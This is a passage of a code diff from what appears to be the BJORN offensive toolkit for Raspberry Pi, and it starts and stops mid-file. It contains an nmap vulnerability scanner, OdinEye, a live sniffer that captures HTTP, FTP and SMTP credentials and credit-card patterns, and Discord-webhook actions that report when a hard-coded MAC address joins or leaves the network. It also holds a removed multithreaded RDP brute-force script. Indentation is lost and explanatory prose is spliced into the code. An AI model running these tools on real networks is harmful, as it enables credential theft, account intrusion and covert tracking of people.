# 5) In-memory deduplication before persisting
findings = self._deduplicate_findings(findings)
# 6) Persistence
self.save_vulnerabilities(mac, ip, findings)
# UI finalization
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
if not ports:
return []
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
return [p for p in ports if p not in seen]
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Remove duplicates (same port + vuln_id) to avoid needless inserts."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extract CVEs with a precompiled regex (no recompilation on each call)."""
if not text:
return []
return CVE_RE.findall(str(text))
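For reference, `CVE_RE` is defined at module level in the original file but is not visible in this hunk; the pattern below is an assumption of its likely shape, shown as a standalone sketch:

```python
import re

# Assumed shape of the module-level precompiled pattern (not shown in this hunk).
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,7}")

output = "smb-vuln-ms17-010: VULNERABLE (CVE-2017-0143); see also CVE-2017-0144"
print(CVE_RE.findall(output))  # → ['CVE-2017-0143', 'CVE-2017-0144']
```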
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""
Orchestrates the scan in batches so the progress bar can be updated.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
# A pause between batches matters on the Pi Zero: it lets the CPU breathe
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
# Reduced default batch size (2 on the Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Update the UI before scanning this batch
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan the batch (local instantiation avoids state corruption)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s, {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Post-batch progress update
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# CPU pause between batches (vital on the Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
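The batching arithmetic used above is a plain list slice; as a standalone sketch with illustrative port values:

```python
ports = ["22", "80", "443", "445", "3389"]
batch_size = 2

# Same slicing expression as in scan_vulnerabilities: the last batch may be short.
batches = [ports[i:i + batch_size] for i in range(0, len(ports), batch_size)]
print(batches)  # → [['22', '80'], ['443', '445'], ['3389']]
```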
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
vulns: List[Dict] = []
nm = nmap.PortScanner()  # local instance: no shared state
# --version-light instead of --version-all: much faster on the Pi Zero
# --min-rate/--max-rate: avoids saturating the CPU and the network
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in nm.all_hosts():
return vulns
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE: {cpe}"
})
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:200]
})
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner()  # local instance
vuln_scripts = [
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate so we do not saturate the Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if ip not in nm.all_hosts():
return vulnerabilities
host = nm[ip]
discovered_ports_in_batch: set = set()
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
# Optional CPE scan (on this batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
cpe_vulns = []
nm = nmap.PortScanner()  # local instance
try:
port_list = ','.join([str(p) for p in ports])
# --version-light instead of --version-all (much faster)
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in nm.all_hosts():
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE: {cpe}"
})
except Exception as e:
logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception:
pass
findings_by_port: Dict[int, Dict] = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {'cves': set(), 'cpes': set()}
vid = str(f.get('vuln_id', ''))
vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid_upper.startswith('CPE:'):
# Store without the "CPE:" prefix
findings_by_port[port]['cpes'].add(vid[4:])
# 1) CVEs
for port, data in findings_by_port.items():
for cve in data['cves']:
try:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
except Exception as e:
logger.error(f"Save CVE err: {e}")
# 2) CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac, cpe=cpe, ip=ip,
hostname=hostname, port=port
)
except Exception as e:
logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")
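The `ON CONFLICT ... DO UPDATE` upsert used by `save_vulnerabilities` can be exercised against an in-memory database. The schema below is a minimal sketch: only the columns used here are declared, and the `UNIQUE(mac_address, vuln_id, port)` constraint is assumed from the conflict target (the real schema lives elsewhere in the project).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE vulnerabilities(
        mac_address TEXT, ip TEXT, hostname TEXT, port INTEGER,
        vuln_id TEXT, is_active INTEGER, last_seen TEXT,
        UNIQUE(mac_address, vuln_id, port))
""")
row = ("aa:bb:cc:dd:ee:ff", "192.168.1.10", None, 445, "CVE-2017-0143")
for _ in range(2):  # the second insert hits the conflict target and updates in place
    conn.execute("""
        INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
        VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
        ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
            is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
    """, row)
print(conn.execute("SELECT COUNT(*) FROM vulnerabilities").fetchone()[0])  # → 1
```

This is why re-scanning a host refreshes `last_seen` instead of piling up duplicate findings.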

actions/odin_eye.py Normal file
@@ -0,0 +1,247 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
import pyshark
HAS_PYSHARK = True
except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="odin_eye.py")
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
b_args = {
"interface": {
"type": "select",
"label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto",
"help": "Interface to listen on."
},
"filter": {
"type": "text",
"label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
}
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
class OdinEye:
def __init__(self, shared_data):
self.shared_data = shared_data
self.capture = None
self.stop_event = threading.Event()
self.statistics = defaultdict(int)
self.credentials: List[Dict[str, Any]] = []
self.lock = threading.Lock()
def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
# HTTP
if hasattr(packet, 'http'):
self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
except Exception as e:
logger.debug(f"Packet processing error: {e}")
def _analyze_http(self, packet):
if hasattr(packet.http, 'request_uri'):
uri = packet.http.request_uri
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
m = re.findall(pattern, uri, re.I)
if m:
self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_ftp(self, packet):
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
field = 'username' if cmd == 'USER' else 'password'
self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
def _analyze_smtp(self, packet):
if hasattr(packet.smtp, 'command_line'):
line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
m = re.findall(pattern, line, re.I)
if m:
self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
}
for name, pattern in patterns.items():
m = re.findall(pattern, payload)
if m:
self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
def _add_cred(self, proto, field, value, source):
with self.lock:
cred = {
'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
try:
if not HAS_PYSHARK:
logger.error("OdinEye: pyshark is not installed; cannot capture.")
return "failed"
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
start_time = time.time()
packet_count = 0
# Use sniff_continuously for real-time processing
for packet in self.capture.sniff_continuously():
if self.shared_data.orchestrator_should_exit:
break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e:
logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally:
if self.capture:
try:
self.capture.close()
except Exception:
pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
return "success"
if __name__ == "__main__":
from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")
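The HTTP entries in `CREDENTIAL_PATTERNS` can be exercised against a sample query string (the URI below is illustrative, not from the source):

```python
import re

# Same HTTP patterns as CREDENTIAL_PATTERNS['http'] above.
patterns = {
    "username": [r"username=([^&]+)", r"user=([^&]+)", r"login=([^&]+)"],
    "password": [r"password=([^&]+)", r"pass=([^&]+)"],
}
uri = "/login.php?username=alice&password=hunter2"
found = {}
for field, pats in patterns.items():
    for pat in pats:
        m = re.findall(pat, uri, re.I)
        if m:
            found[field] = m[0]
            break  # stop at the first matching pattern for this field
print(found)  # → {'username': 'alice', 'password': 'hunter2'}
```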

actions/presence_join.py Normal file
@@ -0,0 +1,84 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or ((row.get("hostnames") or "").split(";")[0] or None)
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")
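A hypothetical sketch of how a scheduler could evaluate the `b_requires` targeting rule shown above; the real evaluator lives in the orchestrator/DB layer and is not shown in this diff, so the function name and row keys are assumptions:

```python
def matches_requires(requires: dict, row: dict) -> bool:
    """Return True if any condition in requires['any'] matches the host row."""
    def check(cond: dict) -> bool:
        mac = (row.get("mac_address") or row.get("MAC Address") or "").lower()
        return "mac_is" in cond and mac == cond["mac_is"].lower()
    return any(check(c) for c in requires.get("any", []))

rule = {"any": [{"mac_is": "60:57:c8:51:63:fb"}]}
print(matches_requires(rule, {"mac_address": "60:57:C8:51:63:FB"}))  # → True
print(matches_requires(rule, {"mac_address": "11:22:33:44:55:66"}))  # → False
```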

actions/presence_left.py Normal file
@@ -0,0 +1,84 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or ((row.get("hostnames") or "").split(";")[0] or None)
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")

@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()  # Reload the scan file to get the latest IPs and ports
# Resolve host metadata before queueing work
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Starting the RDP attack... on port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

actions/rune_cracker.py Normal file
@@ -0,0 +1,209 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
